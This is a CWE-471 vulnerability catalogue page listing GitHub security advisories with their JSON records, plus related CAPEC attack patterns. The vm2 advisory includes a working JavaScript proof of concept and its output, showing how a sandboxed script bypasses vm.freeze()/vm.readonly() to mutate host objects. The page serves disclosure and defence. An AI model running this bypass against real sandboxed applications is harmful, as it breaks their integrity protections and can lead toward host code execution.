Common Weakness Enumeration

CWE-471

Allowed

Modification of Assumed-Immutable Data (MAID)

Abstraction: Base · Status: Draft

The product does not properly protect an assumed-immutable element from being modified by an attacker.

78 vulnerabilities reference this CWE, most recent first.

GHSA-4FJG-RVVJ-3C6Q

Vulnerability from github – Published: 2026-08-07 00:31 – Updated: 2026-08-07 00:31
VLAI
Details

Modification of assumed-immutable data (maid) in Azure Active Directory allows an authorized attacker to elevate privileges over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-50481"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-08-07T00:16:30Z",
    "severity": "CRITICAL"
  },
  "details": "Modification of assumed-immutable data (maid) in Azure Active Directory allows an authorized attacker to elevate privileges over a network.",
  "id": "GHSA-4fjg-rvvj-3c6q",
  "modified": "2026-08-07T00:31:23Z",
  "published": "2026-08-07T00:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50481"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50481"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4P64-V8F5-R2GX

Vulnerability from github – Published: 2026-04-14 20:05 – Updated: 2026-04-14 20:05
VLAI
Summary
Multiple security fixes in justhtml
Details

Summary

justhtml 1.16.0 fixes multiple security issues in sanitization, serialization, and programmatic DOM handling.

Most of these issues affected one of these advanced paths rather than ordinary parsed HTML with the default safe settings:

  • programmatic DOM input to sanitize() or sanitize_dom()
  • reused or mutated sanitization policy objects
  • custom policies that preserve foreign namespaces such as SVG or MathML

Affected versions

  • justhtml <= 1.15.0

Fixed version

  • justhtml 1.16.0 released on April 12, 2026

Impact

Policy reuse and mutation

Nested mutation of sanitization policy internals could weaken later sanitization by leaving stale compiled sanitizers active, or by mutating exported default policy internals process-wide.

In-memory sanitization gaps

Programmatic DOM sanitization could miss dangerous mixed-case tag names such as ScRiPt or StYlE, and custom drop_content_tags values such as {"SCRIPT"} could silently fail to drop dangerous subtrees.

Serialization injection

Crafted programmatic doctype names could serialize into active markup before the document body.

Foreign-namespace policy bypasses

Custom policies that preserve SVG or MathML could allow active SVG features to survive sanitization, including:

  • animation elements such as <set> and <animate> that mutate already-sanitized attributes after sanitization
  • presentation attributes such as fill, clip-path, mask, marker-start, and cursor containing external url(...) references
  • programmatic DOM trees that claim namespace="html" but serialize as <svg> or <math>, bypassing foreign-content checks

Rawtext hardening gap

Mixed-case programmatic style or script nodes could bypass rawtext hardening and preserve active stylesheet content such as remote @import rules.

Default configuration

Most of these issues did not affect the normal JustHTML(..., sanitize=True) path for ordinary parsed HTML.

The main exceptions were policy-mutation issues, which could weaken later sanitization if code mutated nested state on reused policy objects or exported defaults.

Recommended action

Upgrade to justhtml 1.16.0.

If you cannot upgrade immediately:

  • do not mutate DEFAULT_POLICY, DEFAULT_DOCUMENT_POLICY, or nested policy internals
  • avoid reusing policy objects after mutating nested state
  • avoid preserving SVG or MathML for untrusted input
  • avoid preserving style or script in custom policies for untrusted input
  • avoid serializing untrusted programmatic doctypes or DOM trees

Credit

Discovered during an internal security review of justhtml.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.15.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "justhtml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.16.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-178",
      "CWE-436",
      "CWE-471",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T20:05:10Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "## Summary\n\n`justhtml` `1.16.0` fixes multiple security issues in sanitization, serialization, and programmatic DOM handling.\n\nMost of these issues affected one of these advanced paths rather than ordinary parsed HTML with the default safe settings:\n\n- programmatic DOM input to `sanitize()` or `sanitize_dom()`\n- reused or mutated sanitization policy objects\n- custom policies that preserve foreign namespaces such as SVG or MathML\n\n## Affected versions\n\n- `justhtml` `\u003c= 1.15.0`\n\n## Fixed version\n\n- `justhtml` `1.16.0` released on April 12, 2026\n\n## Impact\n\n### Policy reuse and mutation\nNested mutation of sanitization policy internals could weaken later sanitization by leaving stale compiled sanitizers active, or by mutating exported default policy internals process-wide.\n\n### In-memory sanitization gaps\nProgrammatic DOM sanitization could miss dangerous mixed-case tag names such as `ScRiPt` or `StYlE`, and custom `drop_content_tags` values such as `{\"SCRIPT\"}` could silently fail to drop dangerous subtrees.\n\n### Serialization injection\nCrafted programmatic doctype names could serialize into active markup before the document body.\n\n### Foreign-namespace policy bypasses\nCustom policies that preserve SVG or MathML could allow active SVG features to survive sanitization, including:\n\n- animation elements such as `\u003cset\u003e` and `\u003canimate\u003e` that mutate already-sanitized attributes after sanitization\n- presentation attributes such as `fill`, `clip-path`, `mask`, `marker-start`, and `cursor` containing external `url(...)` references\n- programmatic DOM trees that claim `namespace=\"html\"` but serialize as `\u003csvg\u003e` or `\u003cmath\u003e`, bypassing foreign-content checks\n\n### Rawtext hardening gap\nMixed-case programmatic `style` or `script` nodes could bypass rawtext hardening and preserve active stylesheet content such as remote `@import` rules.\n\n## Default configuration\n\nMost of these issues did **not** affect the normal `JustHTML(..., sanitize=True)` path for ordinary parsed HTML.\n\nThe main exceptions were policy-mutation issues, which could weaken later sanitization if code mutated nested state on reused policy objects or exported defaults.\n\n## Recommended action\n\nUpgrade to `justhtml` `1.16.0`.\n\nIf you cannot upgrade immediately:\n\n- do not mutate `DEFAULT_POLICY`, `DEFAULT_DOCUMENT_POLICY`, or nested policy internals\n- avoid reusing policy objects after mutating nested state\n- avoid preserving SVG or MathML for untrusted input\n- avoid preserving `style` or `script` in custom policies for untrusted input\n- avoid serializing untrusted programmatic doctypes or DOM trees\n\n## Credit\n\nDiscovered during an internal security review of `justhtml`.",
  "id": "GHSA-4p64-v8f5-r2gx",
  "modified": "2026-04-14T20:05:10Z",
  "published": "2026-04-14T20:05:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/EmilStenstrom/justhtml/security/advisories/GHSA-4p64-v8f5-r2gx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EmilStenstrom/justhtml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Multiple security fixes in justhtml"
}

GHSA-4V2W-H9JM-MQJG

Vulnerability from github – Published: 2020-11-27 16:07 – Updated: 2021-01-07 22:40
VLAI
Summary
Prototype Pollution in systeminformation
Details

Impact

command injection vulnerability by prototype pollution

Patches

Problem was fixed with a rewrite of shell sanitations to avoid prototyper pollution problems. Please upgrade to version >= 4.30.2

Workarounds

If you cannot upgrade, be sure to check or sanitize service parameter strings that are passed to si.inetChecksite()

For more information

If you have any questions or comments about this advisory:

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "systeminformation"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.30.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-26245"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-11-27T15:56:36Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\ncommand injection vulnerability by prototype pollution\n\n### Patches\nProblem was fixed with a rewrite of shell sanitations to avoid prototyper pollution problems. Please upgrade to version \u003e= 4.30.2\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameter strings that are passed to si.inetChecksite()\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [systeminformation](https://github.com/sebhildebrandt/systeminformation/issues/new?template=bug_report.md)",
  "id": "GHSA-4v2w-h9jm-mqjg",
  "modified": "2021-01-07T22:40:03Z",
  "published": "2020-11-27T16:07:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-4v2w-h9jm-mqjg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26245"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/commit/8113ff0e87b2f422a5756c48f1057575e73af016"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in systeminformation"
}

GHSA-633R-HQ9M-C4FF

Vulnerability from github – Published: 2026-10-01 15:35 – Updated: 2026-10-01 15:35
VLAI
Summary
vm2: vm.freeze()/vm.readonly() bypass via accessor descriptor
Details

Summary

Untrusted JavaScript running inside new VM().run() / new NodeVM().run() can bypass vm.freeze() / vm.readonly() and mutate a host object the embedder explicitly marked read-only - the documented contract is "prevent sandboxed scripts from adding, changing, or deleting properties". If the frozen host object has an accessor (get/set) own-property, the sandbox can read the host setter back out via Object.getOwnPropertyDescriptor() and call it directly; the call lands in BaseHandler.apply which unwraps the readonly proxy to the raw host object and runs the host setter against it. No non-default VM/NodeVM options are required; the only precondition is that the embedder froze an object whose shape includes an accessor property. A second route to the same sink exists via __lookupSetter__.

PoC

// poc.js
'use strict';
const { VM } = require('vm2');

let _level = 'safe';
const hostConfig = Object.defineProperty({}, 'level', {
  get() { return _level; },
  set(v) { _level = String(v); },
  enumerable: true, configurable: true,
});

const vm = new VM();
vm.freeze(hostConfig, 'cfg');

// Baseline - documented barriers hold:
vm.run(`cfg.level = 'via-set';`);
vm.run(`try { Object.defineProperty(cfg, 'level', {value: 'via-dP'}); } catch (e) {}`);
console.log('after [[Set]]/defineProperty:', _level);   // → "safe"

// Bypass - sandbox mutates host via accessor descriptor:
vm.run(`
  const d = Object.getOwnPropertyDescriptor(cfg, 'level');
  d.set.call(cfg, 'PWNED');
`);
console.log('after getOwnPropertyDescriptor→set.call:', _level);   // → "PWNED"

// Variant - same sink via __lookupSetter__:
vm.run(`cfg.__lookupSetter__('level').call(cfg, 'PWNED-2');`);
console.log('after __lookupSetter__:', _level);   // → "PWNED-2"
node poc.js

Observed output:

after [[Set]]/defineProperty: safe
after getOwnPropertyDescriptor→set.call: PWNED
after __lookupSetter__: PWNED-2

The first line shows ReadOnlyHandler's documented traps work; the next two show the sandbox mutated the host-side _level despite vm.freeze().

Impact

A sandboxed script can mutate any accessor-backed property on any host object the embedder exposed via vm.freeze() / vm.readonly(), defeating the read-only contract. Data properties are not affected (ReadOnlyHandler.set / .defineProperty block those correctly). This is not a generic sandbox escape on its own; severity depends on what the embedder froze. If a frozen object's setter feeds into host control flow (e.g. set scriptPath(v), set handler(fn)), this becomes a stepping-stone to host code execution in that embedder.

Preconditions: embedder calls vm.freeze()/vm.readonly() on a host object that has at least one accessor own-property. Default VM/NodeVM options otherwise. Blast radius: integrity of the specific frozen host object(s); downstream impact is embedder-defined. Persistence: as persistent as the host object (typically process-lifetime).

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.11.6"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.9.6"
            },
            {
              "fixed": "3.11.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-92949"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471",
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-01T15:35:25Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nUntrusted JavaScript running inside `new VM().run()` / `new NodeVM().run()` can bypass `vm.freeze()` / `vm.readonly()` and mutate a host object the embedder explicitly marked read-only - the documented contract is \"prevent sandboxed scripts from adding, changing, or deleting properties\". If the frozen host object has an accessor (get/set) own-property, the sandbox can read the host setter back out via `Object.getOwnPropertyDescriptor()` and call it directly; the call lands in `BaseHandler.apply` which unwraps the readonly proxy to the raw host object and runs the host setter against it. No non-default `VM`/`NodeVM` options are required; the only precondition is that the embedder froze an object whose shape includes an accessor property. A second route to the same sink exists via `__lookupSetter__`.\n\n### PoC\n```js\n// poc.js\n\u0027use strict\u0027;\nconst { VM } = require(\u0027vm2\u0027);\n\nlet _level = \u0027safe\u0027;\nconst hostConfig = Object.defineProperty({}, \u0027level\u0027, {\n  get() { return _level; },\n  set(v) { _level = String(v); },\n  enumerable: true, configurable: true,\n});\n\nconst vm = new VM();\nvm.freeze(hostConfig, \u0027cfg\u0027);\n\n// Baseline - documented barriers hold:\nvm.run(`cfg.level = \u0027via-set\u0027;`);\nvm.run(`try { Object.defineProperty(cfg, \u0027level\u0027, {value: \u0027via-dP\u0027}); } catch (e) {}`);\nconsole.log(\u0027after [[Set]]/defineProperty:\u0027, _level);   // \u2192 \"safe\"\n\n// Bypass - sandbox mutates host via accessor descriptor:\nvm.run(`\n  const d = Object.getOwnPropertyDescriptor(cfg, \u0027level\u0027);\n  d.set.call(cfg, \u0027PWNED\u0027);\n`);\nconsole.log(\u0027after getOwnPropertyDescriptor\u2192set.call:\u0027, _level);   // \u2192 \"PWNED\"\n\n// Variant - same sink via __lookupSetter__:\nvm.run(`cfg.__lookupSetter__(\u0027level\u0027).call(cfg, \u0027PWNED-2\u0027);`);\nconsole.log(\u0027after __lookupSetter__:\u0027, _level);   // \u2192 \"PWNED-2\"\n```\n\n```sh\nnode poc.js\n```\n\nObserved output:\n\n```\nafter [[Set]]/defineProperty: safe\nafter getOwnPropertyDescriptor\u2192set.call: PWNED\nafter __lookupSetter__: PWNED-2\n```\n\nThe first line shows `ReadOnlyHandler`\u0027s documented traps work; the next two show the sandbox mutated the host-side `_level` despite `vm.freeze()`.\n\n\n\n### Impact\nA sandboxed script can mutate any accessor-backed property on any host object the embedder exposed via `vm.freeze()` / `vm.readonly()`, defeating the read-only contract. Data properties are not affected (`ReadOnlyHandler.set` / `.defineProperty` block those correctly). This is not a generic sandbox escape on its own; severity depends on what the embedder froze. If a frozen object\u0027s setter feeds into host control flow (e.g. `set scriptPath(v)`, `set handler(fn)`), this becomes a stepping-stone to host code execution in that embedder.\n\n**Preconditions**: embedder calls `vm.freeze()`/`vm.readonly()` on a host object that has at least one accessor own-property. Default `VM`/`NodeVM` options otherwise.\n**Blast radius**: integrity of the specific frozen host object(s); downstream impact is embedder-defined.\n**Persistence**: as persistent as the host object (typically process-lifetime).",
  "id": "GHSA-633r-hq9m-c4ff",
  "modified": "2026-10-01T15:35:25Z",
  "published": "2026-10-01T15:35:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-633r-hq9m-c4ff"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-92949"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/d6ef73bd46488102dae8f4bc35f3f3c0eba2ea64"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.7"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/vm2-3.9.6-before-3.11.7-sandbox-bypass-via-accessor-descriptor"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2: vm.freeze()/vm.readonly() bypass via accessor descriptor"
}

GHSA-6853-5V4J-V7VG

Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2025-04-23 21:30
VLAI
Details

A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.0 SP2). An unauthenticated attacker in the same network of the affected system could manipulate certain parameters and set a valid user of the affected software as invalid (or vice-versa).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-37193"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-14T11:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in SINEMA Remote Connect Server (All versions \u003c V3.0 SP2). An unauthenticated attacker in the same network of the affected system could manipulate certain parameters and set a valid user of the affected software as invalid (or vice-versa).",
  "id": "GHSA-6853-5v4j-v7vg",
  "modified": "2025-04-23T21:30:29Z",
  "published": "2022-05-24T19:14:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37193"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-334944.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6PQ3-928Q-X6W6

Vulnerability from github – Published: 2020-09-03 15:51 – Updated: 2021-06-07 22:49
VLAI
Summary
Prototype Pollution
Details

All versions of utils-extend are vulnerable to prototype pollution. The extend function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "utils-extend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-8147"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T19:01:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "All versions of `utils-extend` are vulnerable to prototype pollution. The `extend` function does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
  "id": "GHSA-6pq3-928q-x6w6",
  "modified": "2021-06-07T22:49:29Z",
  "published": "2020-09-03T15:51:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8147"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/801522"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1502"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype Pollution"
}

GHSA-884M-X6FW-69HF

Vulnerability from github – Published: 2025-01-17 03:30 – Updated: 2025-01-17 03:30
VLAI
Details

IBM QRadar WinCollect Agent 10.0.0 through 10.1.12 could allow a remote attacker to inject XML data into parameter values due to improper input validation of assumed immutable data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-51462"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-17T03:15:07Z",
    "severity": "MODERATE"
  },
  "details": "IBM QRadar WinCollect Agent 10.0.0 through 10.1.12 could allow a remote attacker to inject XML data into parameter values due to improper input validation of assumed immutable data.",
  "id": "GHSA-884m-x6fw-69hf",
  "modified": "2025-01-17T03:30:29Z",
  "published": "2025-01-17T03:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51462"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7176043"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8V9X-9XQG-R8MR

Vulnerability from github – Published: 2021-05-10 19:17 – Updated: 2021-04-19 22:31
VLAI
Summary
Prototype pollution in json8-merge-patch
Details

Prototype pollution vulnerability in json8-merge-patch npm package < 1.0.3 may allow attackers to inject or modify methods and properties of the global object constructor.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "json8-merge-patch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-8268"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-20",
      "CWE-471"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-19T22:31:31Z",
    "nvd_published_at": "2020-11-09T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "Prototype pollution vulnerability in json8-merge-patch npm package \u003c 1.0.3 may allow attackers to inject or modify methods and properties of the global object constructor.",
  "id": "GHSA-8v9x-9xqg-r8mr",
  "modified": "2021-04-19T22:31:31Z",
  "published": "2021-05-10T19:17:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8268"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sonnyp/JSON8/issues/113"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sonnyp/JSON8/commit/2e890261b66cbc54ae01d0c79c71b0fd18379e7e#diff-faa7bef039022bc7ca1c613331b2373950ddd3d65ebf25d1699fbdf89773a387"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/980649"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/json8-merge-patch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in json8-merge-patch"
}

GHSA-9F3G-34X8-92JC

Vulnerability from github – Published: 2026-09-17 15:32 – Updated: 2026-10-01 15:35
Withdrawn 2026-10-01 VLAI
Summary
Duplicate Advisory: vm2: vm.freeze()/vm.readonly() bypass via accessor descriptor
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-633r-hq9m-c4ff. This link is maintained to preserve external references.

Original Description

vm2 versions from 3.9.6 before 3.11.7 fail to properly restrict access to accessor properties on frozen objects, allowing sandboxed scripts to bypass vm.freeze() and vm.readonly() protections. Attackers can use Object.getOwnPropertyDescriptor() or lookupSetter() to extract and invoke host object setters directly, mutating properties the embedder explicitly marked read-only.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.9.6"
            },
            {
              "last_affected": "3.11.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-471"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-01T15:35:12Z",
    "nvd_published_at": "2026-09-17T14:18:00Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of\u00a0GHSA-633r-hq9m-c4ff. This link is maintained to preserve external references.\n\n## Original Description\nvm2 versions from 3.9.6 before 3.11.7 fail to properly restrict access to accessor properties on frozen objects, allowing sandboxed scripts to bypass vm.freeze() and vm.readonly() protections. Attackers can use Object.getOwnPropertyDescriptor() or __lookupSetter__() to extract and invoke host object setters directly, mutating properties the embedder explicitly marked read-only.",
  "id": "GHSA-9f3g-34x8-92jc",
  "modified": "2026-10-01T15:35:12Z",
  "published": "2026-09-17T15:32:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-633r-hq9m-c4ff"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-92949"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/vm2-3.9.6-before-3.11.7-sandbox-bypass-via-accessor-descriptor"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: vm2: vm.freeze()/vm.readonly() bypass via accessor descriptor",
  "withdrawn": "2026-10-01T15:35:12Z"
}

GHSA-9G9W-HMVJ-5H57

Vulnerability from github – Published: 2018-07-26 15:17 – Updated: 2023-09-07 18:19
VLAI
Summary
Prototype Pollution in merge-deep
Details

Versions of merge-deep before 3.0.1 are vulnerable to prototype pollution via merging functions.

Recommendation

Update to version 3.0.1 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "merge-deep"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-3722"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-471"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:28:27Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Versions of `merge-deep` before 3.0.1 are vulnerable to prototype pollution via merging functions.\n\n\n## Recommendation\n\nUpdate to version 3.0.1 or later.",
  "id": "GHSA-9g9w-hmvj-5h57",
  "modified": "2023-09-07T18:19:34Z",
  "published": "2018-07-26T15:17:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3722"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jonschlinkert/merge-deep/commit/2c33634da7129a5aefcc262d2fec2e72224404e5"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/310708"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-9g9w-hmvj-5h57"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/580"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in merge-deep"
}

Mitigation
Architecture and Design Operation Implementation

When the data is stored or transmitted through untrusted sources that could modify the data, implement integrity checks to detect unauthorized modification, or store/transmit the data in a trusted location that is free from external influence.

CAPEC-384: Application API Message Manipulation via Man-in-the-Middle

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Adversary-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.

CAPEC-385: Transaction or Event Tampering via Application API Manipulation

An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.

CAPEC-386: Application API Navigation Remapping

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.

CAPEC-387: Navigation Remapping To Propagate Malicious Content

An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.

CAPEC-388: Application API Button Hijacking

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.